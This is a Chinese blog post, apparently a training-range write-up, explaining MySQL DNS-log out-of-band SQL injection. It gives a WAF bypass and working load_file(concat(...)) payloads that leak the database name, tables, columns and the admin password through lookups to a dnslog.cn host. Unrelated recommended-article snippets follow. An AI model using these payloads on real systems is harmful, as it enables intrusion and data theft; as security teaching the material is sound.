MySQL注入 — Dns 注入

最新推荐文章于 2024-07-17 14:16:37 发布
最新推荐文章于 2024-07-17 14:16:37 发布
阅读量194 收藏
点赞数 1
文章标签: mysql web安全
原文链接:https://www.freebuf.com/articles/web/287519.html
版权 
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具

DNS注入原理

通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。

DNS注入利用的场景

在无法直接利用的情况下,但是可以通过DNS请求,通过DNSlog,把数据外带,用DNS解析记录查看。

DNSLOG的使用场景

在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。

对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。

所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。

DNSLOG的函数解析

LOAD_FILE() 读取文件的函数
读取文件并返回文件内容为字符串。

要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。该文件所有字节可读,但文件内容必须小于max_allowed_packet(限制server接受的数据包大小函数,默认1MB)。 如果该文件不存在或无法读取,因为前面的条件之一不满足,函数返回 NULL。

注:这个功能不是默认开启的,需要在mysql配置文件加一句 secure_file_priv=

DNSLOG平台:

https://dns.xn–9tr.com/

https://log.xn–9tr.com/

UNC路径
UNC路径通用命名规则,也称通用命名规范、通用命名约定,类似\softer这样的形式的网络路径。

UNC路径的格式:\\server\sharename\directory\filename

在这里插入图片描述

等同于SELECT LOAD_FILE(’//库名.1806dl.dnslog.cn/abc’

去访问 库名.1806dl.dnslog.cn 的服务器下的共享文件夹abc。

然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了

DNS注入实战

网址:http://59.63.200.79:8014/index3.php

1.传参id=1,WAF拦截

绕WAF的简单方法:

各种编码绕过
字母大小写转换绕过
空格过滤绕过
双关键字绕过
内联注释绕过

这里加了个 2.txt,来绕过waf。

WEB容器的特性:
apache 他会对index3.php/2.txt请求文件不存在,他会请求前一个。

2.判断注入点

http://59.63.200.79:8014/index3.php/2.txt?id=1 and 1=1
用户输入的数据被当作SQL代码执行了,存在SQL注入。

3. 判断当前页面字段总数

http://59.63.200.79:8014/index3.php/2.txt?id=1%20%20order%20by%202
页面正常

http://59.63.200.79:8014/index3.php/2.txt?id=1%20%20order%20by%203
页面不正常

======》字段数为2。

4.查当前数据库

/2.txt?id=1 and load_file(concat(’//’,
database(),’.htleyd.dnslog.cn/abc’))

======》得到库名 mangzhu。

1630849160_6134c88853cedd55611ae.png!small?1630849158973

在这里插入图片描述

5.查表名

/2.txt?id=1 and load_file(concat(’//’, (select table_name from
information_schema.tables where table_schema=database() limit 0,1
),’.htleyd.dnslog.cn/abc’))

======》得到表名 admin

1630849277_6134c8fd2d9fd435fb760.png!small?163084927581
在这里插入图片描述

6.查列名

/2.txt?id=1 and load_file(concat(‘//‘,(select column_name from
information_schema.columns where table_name=’admin’ and
table_schema=database() limit 2,1),’.htleyd.dnslog.cn/abc’))

======》得到列名 password。

7.查字段内容

/2.txt?id=1 and load_file(concat(‘//‘,(select password from admin
limit 0,1),’.htleyd.dnslog.cn/abc’))

======》得到FLAG 1flag1good1。

在这里插入图片描述
在这里插入图片描述

zkzq
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
mysql dsn 连接字符串_[MySQL] - MySQL连接字符串总结
weixin_31749595的博客
01-19 520
一、MySQL Connector/ODBC 2.50 (MyODBC 2.50)连接方式1、本地数据库连接Driver={MySQL};Server=localhost;Option=16834;Database=myDataBase;2、远程数据连接Driver={MySQL};Server=myServerAddress;Option=131072;Stmt=;Database=myData...
mysql dsn 连接字符串_MySQL连接字符串
weixin_30802399的博客
01-27 242
一、MySQL Connector/ODBC 2.50 (MyODBC 2.50)连接方式1、本地数据库连接Driver={MySQL};Server=localhost;Option=16834;Database=myDataBase;2、远程数据连接Driver={MySQL};Server=myServerAddress;Option=131072;Stmt=;Database=myData...
ODBC方式连接MySQL7.9 及配置DSN教程
12-16
VS2008用ODBC方式连接MySQL7.9配置步骤及配置DSN相关步骤,一步到位的图文教程。
DSN配置(Mysql
wzm112的专栏
12-19 6267
参考网站: http://docs.noahweb.net/config_dsn.htm DSN配置(Mysql)   如果需要使用NoahWeb连接Mysql数据库,则需要进行DSN配置。以windows 2000 server为例,详细步骤如下: 配置DSN 1.点击“开始”--“设置”--“控制面板”。 2.选择“管理工具”。 3.选择“数据源(OD
mysql数据库dsn_使用PDO构造函数连接数据库及DSN详解
weixin_28759259的博客
01-28 1015
pdo是php5中新加入的数据库抽象层,为了解决访问不同数据库统一接口的问题。类似于PEAR::DB类和ADODB类的操作,不过它是直接封装再php扩展中,可以自由选择使用。大理石检测平台在上一篇《什么是PDO?PDO的概特点以及安装PDO的方法》中,我们介绍了什么是PDO,介绍了PDO的特点以及安装,那么我们这篇文章介绍PDO构造函数连接数据库以及DSN详情!PDO构造函数连接数据库在PDO中,...
封神台MYSQL 注入 - Dns注入
qq_40941912的博客
10-05 1135
一、原理 DNSLOG的使用场景: 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 LOAD_FILE()读取文件的函数 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。
SQL注入——mssql注入
cldimd的博客
03-19 2333
1、Mssql权限问题 Mssql角色: 服务器角色--针对运行整个数据库服务器设定的角色和权限。 数据库角色--针对某个特定数据库设定的角色和权限。 固定服务器角色 sysadmin 可以在 SQL Server 中执行任何活动。 serveradmin ...
MySQL 面试题-SQL注入篇.docx
09-17
SQL注入是一种严重的网络安全威胁,尤其针对使用MySQL等数据库系统的Web应用程序。攻击者通过在用户输入的数据中插入恶意SQL代码,可以操控数据库,获取敏感信息,甚至破坏整个系统。以下是关于SQL注入的详细解释和...
SQL注入攻击与防御
10-04
SQL注入是Internet上最危险、最有名的安全漏洞之一,本书是目前唯一一本专门致力于讲解SQL威胁的图书。本书作者均是专门研究SQL注入安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细...
SQL注入攻击与防御(安全技术经典译丛)
02-19
本书作者均是专门研究SQL注入安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细讲解可能引发SQL注入的行为以及攻击者的利用要素,并结合长期实践经验提出了相应的解决方案。...
sql injection(SQL注入)教程
10-25
**DNSLog注入**则是将查询结果写入DNS查询,通过监视DNS流量来获取数据。 最后,**SQL注入写入Webshell**是攻击者通过SQL注入获得服务器的命令执行能力,进而植入Webshell,实现对目标服务器的远程控制。 了解并...
基于PHP主机域名管理器的毕业设计,使用MySQL数据库存储数据,采用PDO方式进行数据库访问 Bootstrap框架DNS管理
04-13
- DNS管理:支持DNS记录的添加、删除、修改、查询等功能,支持多种记录类型; - 域名解析:支持域名的解析,可以根据需要进行域名解析的相关操作; - 域名监控:支持域名的监控,可以实时监控域名的状态,及时发现...
Qt三种方式远程连接MySQL数据库(ODBC方式、DSN方式、直连方式)
子建莫敌
12-13 3180
说明:通过Windows操作系统的ODBC数据源(64位)创建用户DSN或者系统DSN时,请选择“MySQL ODBC 8.0 Unicode Driver”。二、DSN方式远程连接MySQL数据库(程序方式创建ODBC)一、ODBC方式远程连接MySQL数据库。三、直连方式远程连接MySQL数据库。
数据库DSN简介
xu710263124的博客
07-07 6599
一、DSN说明 提起DSN可能,很多人第一想法就是DNSDNSDNS是域名解析服务】,两者之间还是有很大差别的 DNS用于网络域名解析,而DSN【Data Source Name】则是指数据库数据来源。 而DSN,则是指当我们的数据库建立好之后,系统需要知道数据的来源,所以就需要设定系统的 DSN(数据来源名称),当网页在进行访问的时候,才能让网页可以知道数据库所在的位置以及数据库相关的属性。 二、说明 Data Source Name (DSN) [1] 的PDO命名惯例为:PDO驱动程序的名称,
数据库DSN
清风的博客
07-04 1090
在上述示例中,使用了 “mysql” 作为驱动程序名称,“root” 作为用户名,“password” 作为密码,“127.0.0.1:3306” 作为数据库服务器的主机和端口,“mydatabase” 作为要连接的数据库名称,以及一些额外的查询参数。请注意,具体的 DSN 格式可能会因不同的数据库驱动程序和数据库系统而有所变化。因此,请参考您所使用的数据库驱动程序的文档以获取正确的 DSN 格式和组成。您需要根据所使用的数据库驱动程序和数据库系统来确定正确的 DSN 格式和组成。
mysql dsn连接字符串_数据库连接字符串
weixin_31616935的博客
01-27 718
一、SQL ServerODBC标准连接Driver={SQL Server};Server=myServerAddress;Database=myDataBase;Uid=myUsername;Pwd=myPassword;受信的连接Driver={SQL Server};Server=myServerAddress;Database=myDataBase;Trusted_Connection=...
odbc dsn mysql_配置ODBC DSN数据源,导出数据库数据到Excel过程记录
weixin_39926588的博客
01-28 286
一、前言工作中我们可能遇到这样的需要:查询数据库中的信息,并将结果导出到Excel文件。这本来没什么,但数据量比较大时,用PLSQL、toad导出Excel会出现内存不足等情况,使用odbc+Microsoft query + Excel导出提数结果能在一定程度上避免这些问题。环境:个人电脑8G内存,导出130W条记录毫无压力。二、下载、安装Oracle Database ClientWindow...
MySQL & NaviCat 安装及配置教程(Windows)【安装】
绯樱殇雪的博客
07-15 877
MySQL & NaviCat 安装及配置教程
MySQL表中允许有多少个 TRIGGERS(触发器)?
最新发布
sheji888的专栏
07-17 432
MySQL的触发器可以分为六种类型:BEFORE INSERT、AFTER INSERT、BEFORE UPDATE、AFTER UPDATE、BEFORE DELETE、AFTER DELETE,每种类型可以针对一个表定义多个触发器,但是每种类型的触发器在单个表上只能有一个与之关联的命名触发器。:虽然技术上讲每种类型的触发器在单个表上只能有一个命名触发器,但你可以通过创建具有不同名称的相同类型的多个触发器来绕过这个限制,只要这些触发器在触发时满足不同的条件(例如,检查不同的列或满足不同的业务逻辑)。
LAMP框架下的Webmail系统实现:邮件收发与工作原理
- 服务器配置:如DNS设置,确保邮件服务器的域名解析正确。 4. 邮件传输过程: 发送方客户端通过SMTP协议将邮件发送到SMTP服务器,SMTP服务器再将邮件转发到接收方的POP3服务器,接收方通过POP3协议从服务器下载...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值